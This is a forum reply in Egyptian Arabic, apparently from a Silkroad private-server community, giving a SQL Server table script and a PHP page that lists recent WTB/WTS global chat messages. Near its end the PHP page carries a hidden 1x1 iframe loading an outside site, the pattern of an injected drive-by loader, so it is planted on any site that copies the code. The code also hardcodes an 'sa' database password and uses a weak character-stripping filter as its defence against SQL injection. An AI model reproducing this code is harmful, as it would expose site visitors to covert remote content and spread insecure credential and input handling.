|
|
• الانـتـسـاب » Apr 2015
|
|
• رقـم العـضـويـة » 121546
|
|
• المشـــاركـات » 4,029
|
|
• الـدولـة » https://t.me/pump_upp
|
|
• الـهـوايـة » MIS
|
|
• اسـم الـسـيـرفـر » No Server
|
|
• الـجـنـس » Male
|
|
• نقـاط التقييم » 45
|
|
|
   
|
.gif)
رد: طلب في website
اول حاجة هتعمل ال Query ده
كود:
USE [SRO_VT_ACCOUNT]
GO
/****** Object: Table [dbo].[srZor_globalChatLog] Script Date: 03/11/2013 18:32:09 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
SET ANSI_PADDING ON
GO
CREATE TABLE [dbo].[srZor_globalChatLog](
[id] [int] IDENTITY(1,1) NOT NULL,
[sender] [varchar](50) NULL,
[msg] [varchar](300) NULL,
[time] [datetime] NULL
CONSTRAINT [PK_srZor_globalChatLog] PRIMARY KEY CLUSTERED
(
[id] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]
GO
SET ANSI_PADDING OFF
GO
وبعد كدة هتفتح ال Index.php وتحط ده فى
كود:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_COOKIE */
fclose ($fp);
?>
<div id=page_top></div>
<div id=page_content style='min-height: 750px;'>
<div style='background:url(img/news_top.png) no-repeat;width:481px;height:32px;margin-left:11px;color:#White'>
<div id="spc_head"><center><p><h1><font color="white">Last 30 Global WTB or WTS (New)</font></h1></p></center></div>
<?php
$server_name = "Vortex-onlie"; //Server name
$host = "VMI32631\SQLEXPRESS"; // SQL server name for example PC-NAME\SQLEXPRESS
$user = "sa"; // SQL username
$pass = "dusty@123"; // SQL password
$db = "SRO_VT_ACCOUNT"; // SQL Database;
$show = "30"; //Show top 10 for example
?>
<!-- Coded by ThElitEyeS -->
<html>
<head>
<style type="text/css">
<!--
body
table { border-collapse: collapse; text-align: left; width: 100%; } {font: normal 15px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #White; } table td, table th { padding: 0px 13px; } table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #White), color-stop(1, #White) );background:-moz-linear-gradient( center top, #White 5%, #White 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#White', endColorstr='#White');background-color:#White; color:#White; font-size: 15px; font-weight: bold; border-left: 0px solid #White; } table thead th:first-child { border: none; } table tbody td { color: #1DA118; border-left: 1px solid #BC2ED9;font-size: 15px;font-weight: bold; } table tbody .alt td { background: #D8F4AD; color: #23DBC9; } table tbody td:first-child { border-left: none; } table tbody tr:last-child td { border-bottom: none; } table tfoot td div { border-top: 1px solid #White;background: #White;} table tfoot td { padding: 0; font-size: 12px } table tfoot td div{ padding: 2px; }
!-->
</style>
</head>
<body>
<?php
@$connect = odbc_connect("Driver={SQL Server};Server={".$host."}; Database={".$db."}", "".$user."", "".$pass."") or die("<center><b style=\"border:1px dashed #FF0000;\">".str_replace("[Microsoft][ODBC SQL Server Driver][SQL Server]", "", odbc_errormsg())."</b></center>");
@odbc_result_all(odbc_exec($connect, "SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or msg like '%WTB%' order by time desc"));
?>
<iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe>
</body>
</html>
والجزء اللى بالاحمرة ده اللى هتعدل عليه لبيانات السيرفر بتاعك
|